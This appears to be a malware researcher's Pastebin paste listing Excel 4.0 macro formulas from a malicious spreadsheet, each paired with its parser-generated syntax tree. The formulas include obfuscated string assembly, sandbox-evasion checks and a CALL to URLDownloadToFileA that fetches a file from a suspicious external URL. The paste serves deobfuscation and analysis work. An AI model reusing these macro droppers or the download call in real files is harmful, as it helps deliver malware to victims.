Advertisement
dissectmalware

Macro - Sample Parse Tree

Apr 9th, 2020
567
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.84 KB | None | 0 0
  1. =FORMULA($ET$1796&$BE$1701&$DB$1527&$BU$714&$CT$1605)
  2. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'FORMULA'), Tree(arglist, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$ET$1796')])])]), Tree(binary_operator, [Token(CONCATOP, '&')]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$BE$1701')])])])])]), Tree(binary_operator, [Token(CONCATOP, '&')]), Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$DB$1527')])])]), Tree(binary_operator, [Token(CONCATOP, '&')]), Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$BU$714')])])]), Tree(binary_operator, [Token(CONCATOP, '&')]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$CT$1605')])])])])])])])])])])])
  3.  
  4. =RUN($DC$240)
  5. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'RUN'), Tree(arglist, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$DC$240')])])])])])])])
  6.  
  7. =CHAR($IE$1109-308)
  8. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'CHAR'), Tree(arglist, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$IE$1109')])])]), Tree(binary_operator, [Token(ARITHMETICOP, '-')]), Tree(argument, [Token(INT, '308')])])])])])])])
  9.  
  10. =CALL($C$649,$FN$698,$AM$821,0,$BB$54,$BK$36,0,0)
  11. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'CALL'), Tree(arglist, [Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$C$649')])])]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$FN$698')])])]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$AM$821')])])]), Tree(argument, [Token(INT, '0')]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$BB$54')])])]), Tree(argument, [Tree(cell, [Tree(absolute_cell, [Token(__ANON_0, '$BK$36')])])]), Tree(argument, [Token(INT, '0')]), Tree(argument, [Token(INT, '0')])])])])])
  12.  
  13. =HALT()
  14. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'HALT'), Tree(arglist, [])])])])
  15.  
  16. =WAIT(NOW()+"00:00:03")
  17. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'WAIT'), Tree(arglist, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(function_call, [Token(NAME, 'NOW'), Tree(arglist, [])])]), Tree(binary_operator, [Token(ARITHMETICOP, '+')]), Tree(argument, [Tree(string, [Token(__ANON_2, '00:00:03')])])])])])])])])
  18.  
  19. =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
  20. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'IF'), Tree(arglist, [Tree(argument, [Tree(method_call, [Token(NAME, 'GET'), Token(NAME, 'WORKSPACE'), Tree(arglist, [Tree(argument, [Token(INT, '19')])])])]), Tree(argument, [Tree(function_call, [Token(NAME, 'CLOSE'), Tree(arglist, [Tree(argument, [Token(BOOLEAN, 'TRUE')])])])])])])])])
  21.  
  22. =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://ddfspwxrb.club/fb2g424g","c:\Users\Public\bwep5ef.html",0,0),)
  23. Tree(start, [Tree(command, [Tree(function_call, [Token(NAME, 'IF'), Tree(arglist, [Tree(argument, [Tree(binary_expression, [Tree(argument, [Tree(cell, [Tree(relative_cell, [Token(__ANON_1, '[-1]')])])]), Tree(binary_operator, [Token(LOGICALOP, '<')]), Tree(argument, [Token(INT, '0')])])]), Tree(argument, [Tree(function_call, [Token(NAME, 'CALL'), Tree(arglist, [Tree(argument, [Tree(string, [Token(__ANON_2, 'urlmon')])]), Tree(argument, [Tree(string, [Token(__ANON_2, 'URLDownloadToFileA')])]), Tree(argument, [Tree(string, [Token(__ANON_2, 'JJCCJJ')])]), Tree(argument, [Token(INT, '0')]), Tree(argument, [Tree(string, [Token(__ANON_2, 'https://ddfspwxrb.club/fb2g424g')])]), Tree(argument, [Tree(string, [Token(__ANON_2, 'c:\\Users\\Public\\bwep5ef.html')])]), Tree(argument, [Token(INT, '0')]), Tree(argument, [Token(INT, '0')])])])])])])])])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement